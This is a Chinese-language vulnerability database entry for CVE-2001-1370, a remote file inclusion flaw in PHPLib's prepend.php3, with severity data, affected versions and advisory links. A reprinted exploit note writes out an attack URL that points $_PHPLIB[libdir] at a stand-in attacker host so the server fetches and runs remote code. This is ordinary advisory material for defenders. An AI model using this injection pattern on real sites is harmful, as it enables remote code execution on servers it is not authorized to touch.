CVE-2001-1370
CVSS10.0
发布时间 :2001-07-21 00:00:00
修订时间 :2016-10-17 22:14:40
NMCOE    

[原文]prepend.php3 in PHPLib before 7.2d, when register_globals is enabled for PHP, allows remote attackers to execute arbitrary scripts via an HTTP request that modifies $_PHPLIB[libdir] to point to malicious code on another server, as seen in Horde 1.2.5 and earlier, IMP before 2.2.6, and other packages that use PHPLib.


[CNNVD]PHPLib prepend.php3脚本执行漏洞(CNNVD-200107-148)

        PHPLib 7.2d之前版本的prepend.php3在PHP启用register_globals时存在漏洞。远程攻击者可以借助指向另一服务器恶意代码的改进$_PHPLIB[libdir] HTTP请求执行任意脚本,如Horde 1.2.5及其更早版本,IMP 2.2.6及其更早版本,以及其他使用PHPLib的数据包。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phplib_team:phplib:7.2b
cpe:/a:phplib_team:phplib:7.2.1
cpe:/a:phplib_team:phplib:7.2c
cpe:/a:phplib_team:phplib:7.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1370
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1370
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-148
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2001-027.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-027.0
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000410
(UNKNOWN)  CONECTIVA  CLA-2001:410
http://marc.info/?l=bugtraq&m=99616122712122&w=2
(UNKNOWN)  BUGTRAQ  20010726 TSLSA-2001-0014 - PHPLib
http://online.securityfocus.com/archive/1/198495
(UNKNOWN)  BUGTRAQ  20010721 IMP 2.2.6 (SECURITY) released
http://www.debian.org/security/2001/dsa-073
(VENDOR_ADVISORY)  DEBIAN  DSA-073
http://www.iss.net/security_center/static/6892.php
(VENDOR_ADVISORY)  XF  phplib-script-execution(6892)
http://www.securityfocus.com/archive/1/198768
(VENDOR_ADVISORY)  BUGTRAQ  20010722 [SEC] Hole in PHPLib 7.2 prepend.php3
http://www.securityfocus.com/bid/3079
(VENDOR_ADVISORY)  BID  3079

- 漏洞信息

PHPLib prepend.php3脚本执行漏洞
危急 未知
2001-07-21 00:00:00 2005-05-02 00:00:00
远程  
        PHPLib 7.2d之前版本的prepend.php3在PHP启用register_globals时存在漏洞。远程攻击者可以借助指向另一服务器恶意代码的改进$_PHPLIB[libdir] HTTP请求执行任意脚本,如Horde 1.2.5及其更早版本,IMP 2.2.6及其更早版本,以及其他使用PHPLib的数据包。

- 公告与补丁

        

- 漏洞信息 (21022)

PHPLib Team PHPLIB 7.2 Remote Script Execution Vulnerability (EDBID:21022)
php webapps
2001-07-21 Verified
0 giancarlo pinerolo
N/A [点击下载]
source: http://www.securityfocus.com/bid/3079/info

The PHP Base Library('PHPLIB') is a code library which provides support for session management in web applications. It is targeted to developers and is widely used in many web applications, so a strong possibility exists that an application may be using it without the knowledge of the administrator. 

A problem in PHPLIB will allow remote attackers to submit malicious input in web requests that will cause the application to fetch and then execute scripts from another host.

This may allow for attackers to gain local access to the webserver.

If $_PHPLIB[libdir] is a string whose value
is "http://attacker.com/", this instruction will be executed:

require("http://attacker.com/" . "db_mysql.inc");

Thus, simply crafting a URL like:

http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/

will make the script 'page.php'(which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc'.		

- 漏洞信息

5411
PHPLib prepend.php3 $_PHPLIB[libdir] Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2004-04-09 Unknow
2004-04-09 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站